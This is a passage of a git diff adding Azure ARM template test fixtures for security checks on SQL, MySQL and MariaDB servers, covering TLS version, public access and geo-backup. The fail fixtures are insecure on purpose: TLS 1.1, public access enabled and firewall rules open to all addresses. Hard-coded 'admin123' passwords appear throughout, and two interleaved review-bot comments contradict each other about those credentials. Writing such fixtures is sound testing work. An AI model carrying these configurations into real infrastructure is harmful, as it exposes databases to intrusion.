"[resourceId('Microsoft.Network/publicIPAddresses', variables('publicIPAddressName'))]", + "networkSecurityGroupName": "default-NSG" + }, + "resources": [ + + { + "type": "Microsoft.Compute/virtualMachines", + "apiVersion": "2020-06-01", + "dependsOn": [ + "[resourceId('Microsoft.Storage/storageAccounts/', variables('storageAccountName'))]", + "[resourceId('Microsoft.Network/networkInterfaces/', variables('nic1Name'))]", + "[resourceId('Microsoft.Network/networkInterfaces/', variables('nic2Name'))]" + ], + "location": "[parameters('location')]", + "name": "pass", + "properties": { + "diagnosticsProfile": { + "bootDiagnostics": { + "enabled": true, + "storageUri": "[reference(resourceId('Microsoft.Storage/storageAccounts/', variables('storageAccountName')), 
'2019-06-01').primaryEndpoints.blob]" + } + }, + "hardwareProfile": { + "vmSize": "[parameters('vmSize')]" + }, + "networkProfile": { + "networkInterfaces": [ + { + "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nic1Name'))]", + "properties": { + "primary": true + } + }, + { + "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nic2Name'))]", + "properties": { + "primary": false + } + } + ] + }, + "osProfile": { + "computerName": "[parameters('vmName')]", + "adminUsername": "[parameters('adminUsername')]", + "linuxConfiguration": { + "disablePasswordAuthentication": true, + "ssh": { + "publicKeys": [ + { + "path": "/.ssh/authorized_keys", + "keyData": "[parameters('sshKeyData')]" + } + ] + } + } + }, + "storageProfile": { + "imageReference": { + "publisher": "[variables('imagePublisher')]", + "offer": "[variables('imageOffer')]", + "sku": "[parameters('ubuntuOSVersion')]", + "version": "latest" + }, + "osDisk": { + "createOption": "FromImage" + } + } + } + }, + { + "type": "Microsoft.Compute/virtualMachineScaleSets", + "name": "pass", + "location": "[parameters('location')]", + "apiVersion": "2019-12-01", + "dependsOn": [ + "[resourceId('Microsoft.Network/loadBalancers', variables('loadBalancerName'))]" + ], + "sku": { + "name": "[parameters('vmSku')]", + "capacity": "[parameters('instanceCount')]" + }, + "properties": { + "overprovision": true, + "upgradePolicy": { + "mode": "Manual" + }, + "virtualMachineProfile": { + "storageProfile": { + "osDisk": { + "createOption": "FromImage", + "caching": "ReadWrite" + }, + "imageReference": { + "publisher": "Canonical", + "offer": "UbuntuServer", + "sku": "16.04-LTS", + "version": "latest" + } + }, + "osProfile": { + "computerNamePrefix": "[parameters('vmssName')]", + "adminUsername": "[parameters('adminUsername')]", + "adminPassword": "[parameters('adminPasswordOrKey')]", + "linuxConfiguration": { + "disablePasswordAuthentication": true, + "ssh": { + "publicKeys": [ + { + "path": 
"/.ssh/authorized_keys", + "keyData": "[parameters('sshKeyData')]" + } + ] + } + } + }, + "networkProfile": { + "networkInterfaceConfigurations": [ + { + "name": "nic", + "properties": { + "primary": true, + "ipConfigurations": [ + { + "name": "ipconfig", + "properties": { + "subnet": { + "id": "[resourceId(parameters('existingVnetResourceGroupName'), 'Microsoft.Network/virtualNetworks/subnets', parameters('existingVnetName'), parameters('existingSubNetName'))]" + }, + "loadBalancerBackendAddressPools": [ + { + "id": "[resourceId('Microsoft.Network/loadBalancers/backendAddressPools', variables('loadBalancerName'), variables('loadBalancerBackEndName'))]" + } + ], + "loadBalancerInboundNatPools": [ + { + "id": "[resourceId('Microsoft.Network/loadBalancers/inboundNatPools', variables('loadBalancerName'), variables('loadBalancerNatPoolName'))]" + } + ] + } + } + ] + } + } + ] + } + } + } + } + ], + "outputs": { + "sshCommand": { + "type": "string", + "value": "[concat('ssh ', parameters('adminUsername'), '@', parameters('vmName'), '.', parameters('location'), '.cloudapp.azure.com')]" + } + } +} diff --git a/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json new file mode 100644 index 00000000000..34dcc4540d4 --- /dev/null +++ b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json 
@@ -0,0 +1,246 @@ +{ + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "apiVersion": { + "type": "string", + "defaultValue": "2021-05-01" + }, + "administratorLogin": { + "type": "string" + }, + "administratorLoginPassword": { + "type": "securestring" + }, + "location": { + "type": "string" + }, + "serverName": { + "type": "string" + }, + "serverEdition": { + "type": "string" + }, + "vCores": { + "type": "int", + "defaultValue": 4 + }, + "storageSizeGB": { + "type": "int" + }, + "haEnabled": { + "type": "string", + "defaultValue": "Disabled" + }, + "availabilityZone": { + "type": "string", + "defaultValue": "" + }, + "standbyAvailabilityZone": { + "type": "string" + }, + "version": { + "type": "string" + }, + "tags": { + "type": "object", + "defaultValue": {} + }, + "firewallRules": { + "type": "object", + "defaultValue": {} + }, + "backupRetentionDays": { + "type": "int" + }, + "geoRedundantBackup": { + "type": "string" + }, + "vmName": { + "type": "string", + "defaultValue": "Standard_B1ms" + }, + "storageIops": { + "type": "int" + }, + "storageAutogrow": { + "type": "string", + "defaultValue": "Enabled" + }, + "autoIoScaling": { + "type": "string", + "defaultValue": "Disabled" + }, + "identityData": { + "type": "object", + "defaultValue": {} + }, + "dataEncryptionData": { + "type": "object", + "defaultValue": {} + }, + "serverParameters": { + "type": "array", + "defaultValue": [] + }, + "aadEnabled": { + "type": "bool", + "defaultValue": false + }, + "aadData": { + "type": "object", + "defaultValue": {} + }, + "guid": { + "type": "string", + "defaultValue": "[newGuid()]" + }, + "network": { + "type": "object", + "defaultValue": {} + }, + "firewallRulesAPIVersion": { + "type": "string", + "defaultValue": "2022-01-01" + } + }, + "variables": { + "api": "[parameters('apiVersion')]", + "firewallRules": "[parameters('firewallRules').rules]", + "serverParameters": 
"[parameters('serverParameters')]" + }, + "resources": [ + { + "type": "Microsoft.Sql/servers", + "apiVersion": "2023-05-01-preview", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "identity": { + "type": "string", + "userAssignedIdentities": { + "{customized property}": {} + } + }, + "properties": { + "administratorLogin": "string", + "administratorLoginPassword": "string", + "administrators": { + "administratorType": "ActiveDirectory", + "azureADOnlyAuthentication": "bool", + "login": "string", + "principalType": "string", + "sid": "string", + "tenantId": "string" + }, + "federatedClientId": "string", + "isIPv6Enabled": "string", + "keyId": "string", + "minimalTlsVersion": "1.1", + "primaryUserAssignedIdentityId": "string", + "publicNetworkAccess": "string", + "restrictOutboundNetworkAccess": "string", + "version": "string" + } + }, + { + "condition": "[greater(length(variables('firewallRules')), 0)]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]", + "copy": { + "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]", + "mode": "Serial", + "name": "firewallRulesIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules", + "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]", + "apiVersion": "[parameters('firewallRulesAPIVersion')]", + "properties": { + "StartIpAddress": 
"[variables('firewallRules')[copyIndex()].startIPAddress]", + "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]" + } + } + ] + } + } + }, + { + "condition": "[parameters('aadEnabled')]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('addAdmins-', parameters('guid'))]", + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/administrators", + "name": "[concat(parameters('serverName'),'/ActiveDirectory')]", + "apiVersion": "[variables('api')]", + "properties": { + "administratorType": "[parameters('aadData').administratorType]", + "identityResourceId": "[parameters('aadData').identityResourceId]", + "login": "[parameters('aadData').login]", + "sid": "[parameters('aadData').sid]", + "tenantId": "[parameters('aadData').tenantId]" + } + } + ] + } + } + }, + { + "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "copy": { + "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]", + "mode": "serial", + "name": "serverParametersIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": 
"Microsoft.DBforMySQL/flexibleServers/configurations", + "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]", + "apiVersion": "[variables('api')]", + "properties": { + "value": "[variables('serverParameters')[copyIndex()].value]", + "source": "[variables('serverParameters')[copyIndex()].source]" + } + } + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json new file mode 100644 index 00000000000..5244f95722e --- /dev/null +++ b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json 
@@ -0,0 +1,246 @@ +{ + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "apiVersion": { + "type": "string", + "defaultValue": "2021-05-01" + }, + "administratorLogin": { + "type": "string" + }, + "administratorLoginPassword": { + "type": "securestring" + }, + "location": { + "type": "string" + }, + "serverName": { + "type": "string" + }, + "serverEdition": { + "type": "string" + }, + "vCores": { + "type": "int", + "defaultValue": 4 + }, + "storageSizeGB": { + "type": "int" + }, + "haEnabled": { + "type": "string", + "defaultValue": "Disabled" + }, + "availabilityZone": { + "type": "string", + "defaultValue": "" + }, + "standbyAvailabilityZone": { + "type": "string" + }, + "version": { + "type": "string" + }, + "tags": { + "type": "object", + "defaultValue": {} + }, + "firewallRules": { + "type": "object", + "defaultValue": {} + }, + "backupRetentionDays": { + "type": "int" + }, + "geoRedundantBackup": { + "type": "string" + }, + "vmName": { + "type": "string", + "defaultValue": "Standard_B1ms" + }, + "storageIops": { + "type": "int" + }, + "storageAutogrow": { + "type": "string", + "defaultValue": "Enabled" + }, + "autoIoScaling": { + "type": "string", + "defaultValue": "Disabled" + }, + "identityData": { + "type": "object", + "defaultValue": {} + }, + "dataEncryptionData": { + "type": "object", + "defaultValue": {} + }, + "serverParameters": { + "type": "array", + "defaultValue": [] + }, + "aadEnabled": { + "type": "bool", + "defaultValue": false + }, + "aadData": { + "type": "object", + "defaultValue": {} + }, + "guid": { + "type": "string", + "defaultValue": "[newGuid()]" + }, + "network": { + "type": "object", + "defaultValue": {} + }, + "firewallRulesAPIVersion": { + "type": "string", + "defaultValue": "2022-01-01" + } + }, + "variables": { + "api": "[parameters('apiVersion')]", + "firewallRules": "[parameters('firewallRules').rules]", + "serverParameters": 
"[parameters('serverParameters')]" + }, + "resources": [ + { + "type": "Microsoft.Sql/servers", + "apiVersion": "2023-05-01-preview", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "identity": { + "type": "string", + "userAssignedIdentities": { + "{customized property}": {} + } + }, + "properties": { + "administratorLogin": "string", + "administratorLoginPassword": "string", + "administrators": { + "administratorType": "ActiveDirectory", + "azureADOnlyAuthentication": "bool", + "login": "string", + "principalType": "string", + "sid": "string", + "tenantId": "string" + }, + "federatedClientId": "string", + "isIPv6Enabled": "string", + "keyId": "string", + "minimalTlsVersion": "1.2", + "primaryUserAssignedIdentityId": "string", + "publicNetworkAccess": "string", + "restrictOutboundNetworkAccess": "string", + "version": "string" + } + }, + { + "condition": "[greater(length(variables('firewallRules')), 0)]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]", + "copy": { + "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]", + "mode": "Serial", + "name": "firewallRulesIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules", + "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]", + "apiVersion": "[parameters('firewallRulesAPIVersion')]", + "properties": { + "StartIpAddress": 
"[variables('firewallRules')[copyIndex()].startIPAddress]", + "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]" + } + } + ] + } + } + }, + { + "condition": "[parameters('aadEnabled')]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('addAdmins-', parameters('guid'))]", + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/administrators", + "name": "[concat(parameters('serverName'),'/ActiveDirectory')]", + "apiVersion": "[variables('api')]", + "properties": { + "administratorType": "[parameters('aadData').administratorType]", + "identityResourceId": "[parameters('aadData').identityResourceId]", + "login": "[parameters('aadData').login]", + "sid": "[parameters('aadData').sid]", + "tenantId": "[parameters('aadData').tenantId]" + } + } + ] + } + } + }, + { + "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "copy": { + "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]", + "mode": "serial", + "name": "serverParametersIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": 
"Microsoft.DBforMySQL/flexibleServers/configurations", + "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]", + "apiVersion": "[variables('api')]", + "properties": { + "value": "[variables('serverParameters')[copyIndex()].value]", + "source": "[variables('serverParameters')[copyIndex()].source]" + } + } + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/fail.json b/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/fail.json new file mode 100644 index 00000000000..06e3d1ee74e --- /dev/null +++ b/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/fail.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "apiVersion": "2018-06-01", + "type": "Microsoft.DBforMariaDB/servers", + "location": "West Europe", + "name": "fail", + "sku": { + "name": "B_Gen5_2", + "size": "5120" + }, + "properties": { + "version": "10.3", + "administratorLogin": "admin", + "administratorLoginPassword": "admin123", + "publicNetworkAccess": "Enabled", + "storageProfile": { + "geoRedundantBackup": "Disabled", + "storageMB": "5120" + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/pass.json b/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/pass.json new file mode 100644 index 00000000000..c1f215cf7bb --- /dev/null +++ b/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/pass.json 
@@ -0,0 +1,26 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "apiVersion": "2018-06-01",
+ "type": "Microsoft.DBforMariaDB/servers",
+ "location": "West Europe",
+ "name": "pass",
+ "sku": {
+ "name": "B_Gen5_2",
+ "size": "5120"
+ },
+ "properties": {
+ "version": "10.3",
+ "administratorLogin": "admin",
+ "administratorLoginPassword": "admin123",
+ "publicNetworkAccess": "Enabled",
+ "storageProfile": {
+ "geoRedundantBackup": "Enabled",
+ "storageMB": "5120"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/fail.json b/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/fail.json
new file mode 100644
index 00000000000..17d127061e1
--- /dev/null
+++ b/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/fail.json
@@ -0,0 +1,25 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "apiVersion": "2018-06-01",
+ "type": "Microsoft.DBforMariaDB/servers",
+ "location": "West Europe",
+ "name": "fail",
+ "sku": {
+ "name": "B_Gen5_2",
+ "size": "5120"
+ },
+ "properties": {
+ "version": "10.3",
+ "administratorLogin": "admin",
+ "administratorLoginPassword": "admin123",
+ "publicNetworkAccess": "Enabled",
+ "storageProfile": {
+ "storageMB": "5120"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/pass.json b/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/pass.json
new file mode 100644
index 00000000000..5bb8115ad61
--- /dev/null
+++ b/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/pass.json
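Review bot: The fail fixture sets `"publicNetworkAccess": "Enabled"` explicitly, but the typical misconfiguration is leaving the property unset, which on Microsoft.DBforMariaDB/servers defaults to public access being enabled as far as I know; a second server resource with the property omitted would show that the check fails closed on absence rather than silently passing it. The hunk also embeds `"administratorLogin": "admin"` and `"administratorLoginPassword": "admin123"`; a placeholder such as `"[parameters('administratorLoginPassword')]"` keeps the fixture from reading as a worked example of hard-coded credentials and from tripping secret scanners run over the repository.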
@@ -0,0 +1,25 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "apiVersion": "2018-06-01",
+ "type": "Microsoft.DBforMariaDB/servers",
+ "location": "West Europe",
+ "name": "pass",
+ "sku": {
+ "name": "B_Gen5_2",
+ "size": "5120"
+ },
+ "properties": {
+ "version": "10.3",
+ "administratorLogin": "admin",
+ "administratorLoginPassword": "admin123",
+ "publicNetworkAccess" : "Disabled",
+ "storageProfile": {
+ "storageMB": "5120"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json
new file mode 100644
index 00000000000..af482998d76
--- /dev/null
+++ b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json
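Review bot: `"publicNetworkAccess" : "Disabled"` has a stray space before the colon, unlike every other key in this fixture and in the sibling fail.json; `"publicNetworkAccess": "Disabled"` keeps the pass and fail files diff-able line by line. Keeping the rest of the resource byte-identical to fail.json (as it already is, including the literal `admin`/`admin123` credentials) is the right shape for a unit fixture, so only that one property should differ.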
@@ -0,0 +1,257 @@ + +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "1923296876861958074" + } + }, + "parameters": { + "serverName": { + "type": "string", + "metadata": { + "description": "Server Name for Azure database for MySQL" + } + }, + "administratorLogin": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Database administrator login name" + } + }, + "administratorLoginPassword": { + "type": "securestring", + "minLength": 8, + "metadata": { + "description": "Database administrator password" + } + }, + "skuCapacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Azure database for MySQL compute capacity in vCores (2,4,8,16,32)" + } + }, + "skuName": { + "type": "string", + "defaultValue": "GP_Gen5_2", + "metadata": { + "description": "Azure database for MySQL sku name " + } + }, + "SkuSizeMB": { + "type": "int", + "defaultValue": 5120, + "metadata": { + "description": "Azure database for MySQL Sku Size " + } + }, + "SkuTier": { + "type": "string", + "defaultValue": "GeneralPurpose", + "allowedValues": [ + "Basic", + "GeneralPurpose", + "MemoryOptimized" + ], + "metadata": { + "description": "Azure database for MySQL pricing tier" + } + }, + "skuFamily": { + "type": "string", + "defaultValue": "Gen5", + "metadata": { + "description": "Azure database for MySQL sku family" + } + }, + "mysqlVersion": { + "type": "string", + "defaultValue": "8.0", + "allowedValues": [ + "5.6", + "5.7", + "8.0" + ], + "metadata": { + "description": "MySQL version" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + }, + "backupRetentionDays": { + "type": "int", + "defaultValue": 7, + "metadata": { + "description": "MySQL Server backup retention days" + } + }, + "geoRedundantBackup": { + "type": "string", + "defaultValue": "Disabled", + "metadata": { + "description": "Geo-Redundant Backup setting" + } + }, + "virtualNetworkName": { + "type": "string", + "defaultValue": "azure_mysql_vnet", + "metadata": { + "description": "Virtual Network Name" + } + }, + "subnetName": { + "type": "string", + "defaultValue": "azure_mysql_subnet", + "metadata": { + "description": "Subnet Name" + } + }, + "virtualNetworkRuleName": { + "type": "string", + "defaultValue": "AllowSubnet", + "metadata": { + "description": "Virtual Network RuleName" + } + }, + "vnetAddressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Virtual Network Address Prefix" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Subnet Address Prefix" + } + } + }, + "variables": { + "firewallrules": [ + { + "Name": "rule1", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + }, + { + "Name": "rule2", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + } + ] + }, + "resources": [ + { + "type": "Microsoft.DBforMySQL/servers/virtualNetworkRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), parameters('virtualNetworkRuleName'))]", + "properties": { + "virtualNetworkSubnetId": "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]", + "ignoreMissingVnetServiceEndpoint": true + }, + "dependsOn": [ + "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]", + "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]" + ] + }, + { + "type": "Microsoft.Network/virtualNetworks", + "apiVersion": "2023-09-01", 
+ "name": "[parameters('virtualNetworkName')]", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('vnetAddressPrefix')]" + ] + } + } + }, + { + "type": "Microsoft.Network/virtualNetworks/subnets", + "apiVersion": "2023-09-01", + "name": "[format('{0}/{1}', parameters('virtualNetworkName'), parameters('subnetName'))]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks', parameters('virtualNetworkName'))]" + ] + }, + { + "type": "Microsoft.DBforMySQL/servers", + "apiVersion": "2017-12-01", + "name": "fail", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('skuName')]", + "tier": "[parameters('SkuTier')]", + "capacity": "[parameters('skuCapacity')]", + "size": "[format('{0}', parameters('SkuSizeMB'))]", + "family": "[parameters('skuFamily')]" + }, + "properties": { + "createMode": "Default", + "version": "[parameters('mysqlVersion')]", + "administratorLogin": "[parameters('administratorLogin')]", + "administratorLoginPassword": "[parameters('administratorLoginPassword')]", + "storageProfile": { + "storageMB": "[parameters('SkuSizeMB')]", + "backupRetentionDays": "[parameters('backupRetentionDays')]", + "geoRedundantBackup": "[parameters('geoRedundantBackup')]" + }, + "minimalTlsVersion": "TLS1_1", + "sslEnforcement": "Enabled" + } + }, + { + "copy": { + "name": "firewallRules", + "count": "[length(variables('firewallrules'))]", + "mode": "serial", + "batchSize": 1 + }, + "type": "Microsoft.DBforMySQL/servers/firewallRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), variables('firewallrules')[copyIndex()].Name)]", + "properties": { + "startIpAddress": "[variables('firewallrules')[copyIndex()].StartIpAddress]", + "endIpAddress": "[variables('firewallrules')[copyIndex()].EndIpAddress]" + }, + "dependsOn": [ + 
"[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]" + ] + } + ], + "outputs": { + "location": { + "type": "string", + "value": "[parameters('location')]" + }, + "name": { + "type": "string", + "value": "[parameters('serverName')]" + }, + "resourceGroupName": { + "type": "string", + "value": "[resourceGroup().name]" + }, + "resourceId": { + "type": "string", + "value": "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]" + } + } +} diff --git a/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json new file mode 100644 index 00000000000..a464424d13c --- /dev/null +++ b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json 
@@ -0,0 +1,257 @@ + +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "1923296876861958074" + } + }, + "parameters": { + "serverName": { + "type": "string", + "metadata": { + "description": "Server Name for Azure database for MySQL" + } + }, + "administratorLogin": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Database administrator login name" + } + }, + "administratorLoginPassword": { + "type": "securestring", + "minLength": 8, + "metadata": { + "description": "Database administrator password" + } + }, + "skuCapacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Azure database for MySQL compute capacity in vCores (2,4,8,16,32)" + } + }, + "skuName": { + "type": "string", + "defaultValue": "GP_Gen5_2", + "metadata": { + "description": "Azure database for MySQL sku name " + } + }, + "SkuSizeMB": { + "type": "int", + "defaultValue": 5120, + "metadata": { + "description": "Azure database for MySQL Sku Size " + } + }, + "SkuTier": { + "type": "string", + "defaultValue": "GeneralPurpose", + "allowedValues": [ + "Basic", + "GeneralPurpose", + "MemoryOptimized" + ], + "metadata": { + "description": "Azure database for MySQL pricing tier" + } + }, + "skuFamily": { + "type": "string", + "defaultValue": "Gen5", + "metadata": { + "description": "Azure database for MySQL sku family" + } + }, + "mysqlVersion": { + "type": "string", + "defaultValue": "8.0", + "allowedValues": [ + "5.6", + "5.7", + "8.0" + ], + "metadata": { + "description": "MySQL version" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + }, + "backupRetentionDays": { + "type": "int", + "defaultValue": 7, + "metadata": { + "description": "MySQL Server backup retention days" + } + }, + "geoRedundantBackup": { + "type": "string", + "defaultValue": "Disabled", + "metadata": { + "description": "Geo-Redundant Backup setting" + } + }, + "virtualNetworkName": { + "type": "string", + "defaultValue": "azure_mysql_vnet", + "metadata": { + "description": "Virtual Network Name" + } + }, + "subnetName": { + "type": "string", + "defaultValue": "azure_mysql_subnet", + "metadata": { + "description": "Subnet Name" + } + }, + "virtualNetworkRuleName": { + "type": "string", + "defaultValue": "AllowSubnet", + "metadata": { + "description": "Virtual Network RuleName" + } + }, + "vnetAddressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Virtual Network Address Prefix" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Subnet Address Prefix" + } + } + }, + "variables": { + "firewallrules": [ + { + "Name": "rule1", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + }, + { + "Name": "rule2", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + } + ] + }, + "resources": [ + { + "type": "Microsoft.DBforMySQL/servers/virtualNetworkRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), parameters('virtualNetworkRuleName'))]", + "properties": { + "virtualNetworkSubnetId": "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]", + "ignoreMissingVnetServiceEndpoint": true + }, + "dependsOn": [ + "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]", + "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]" + ] + }, + { + "type": "Microsoft.Network/virtualNetworks", + "apiVersion": "2023-09-01", 
